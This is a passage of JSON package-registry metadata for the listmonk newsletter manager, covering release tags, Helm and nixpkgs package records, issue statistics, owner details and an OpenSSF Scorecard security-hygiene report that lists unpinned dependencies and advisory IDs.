00Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-26T08:27:50.276Z","dependent_packages_count":0,"downloads":0,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":0.0,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:helm/listmonk-chart/listmonk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/helm/listmonk-chart/listmonk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/helm/listmonk-chart/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/helm/listmonk-chart/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:04:41.213Z","issues_count":939,"pull_requests_count":436,"avg_time_to_close_issue":6047242.725731895,"avg_time_to_close_pull_request":1085166.282051282,"issues_closed_count":649,"pull_requests_closed_count":351,"pull_request_authors_count":192,"issue_authors_count":631,"avg_comments_per_issue":2.7401490947816827,"avg_comments_per_pull_request":1.1995412844036697,"merged_pull_requests_count":242,"bot_issues_count":0,"bot_pull_requests_count":73,"past_year_issues_count":99,"past_year_pull_requests_count":78,"past_year_avg_time_to_close_issue":3732101.7,"past_year_avg_time_to_close_pull_request":605370.9818181818,"past_year_issues_closed_count":40,"past_year_pull_requests_closed_count":55,"past_year_pull_request_authors_count":48,"past_year_issue_authors_count":84,"past_year_avg_comments_per_issue":1.6565656565656566,"past_year_avg_comments_per_pull_request":1.3205128205128205,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":21,"past_year_merged_pull_requests_count":24,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/listmonk-chart%2Flistmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/listmonk-chart%2Flistmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/listmonk-chart%2Flistmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/listmonk-chart%2Flistmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/listmonk-chart%2Flistmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/listmonk-chart%2Flistmonk/codemeta","maintainers":[],"registry":{"name":"artifacthub.io","url":"https://artifacthub.io","ecosystem":"helm","default":true,"packages_count":18199,"maintainers_count":0,"namespaces_count":5397,"keywords_count":10063,"github":"artifacthub","metadata":{"funded_packages_count":1011,"rate_limit":0.5},"icon_url":"https://github.com/artifacthub.png","created_at":"2026-01-29T12:56:41.438Z","updated_at":"2026-09-01T05:05:43.053Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/namespaces"}},{"id":13061270,"name":"listmonk","ecosystem":"nixpkgs","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard","homepage":"https://github.com/knadh/listmonk","licenses":"AGPL-3.0-only","normalized_licenses":["AGPL-3.0-only"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T16:40:14.165Z","latest_release_published_at":"2026-02-01T16:40:14.165Z","latest_release_number":"3.0.0","last_synced_at":"2026-03-09T06:14:29.002Z","created_at":"2026-02-01T16:40:13.712Z","updated_at":"2026-08-18T02:47:52.884Z","registry_url":"https://search.nixos.org/packages?channel=24.11\u0026query=listmonk","install_command":"nix-env -iA nixpkgs.listmonk","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.11/pkgs/by-name/li/listmonk/package.nix#L61","metadata":{"nix_attribute":"listmonk-3.0.0","position":"pkgs/by-name/li/listmonk/package.nix:61","platforms":["x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","wasm64-wasi","wasm32-wasi","i686-freebsd","x86_64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary app.","archived":false,"fork":false,"pushed_at":"2026-08-17T17:59:57.000Z","size":51687,"stargazers_count":22959,"open_issues_count":105,"forks_count":2530,"subscribers_count":140,"default_branch":"master","last_synced_at":"2026-08-18T02:44:25.356Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-18T02:21:35.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: .github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36754175,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-18T02:00:06.197Z","response_time":52,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive ","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/kna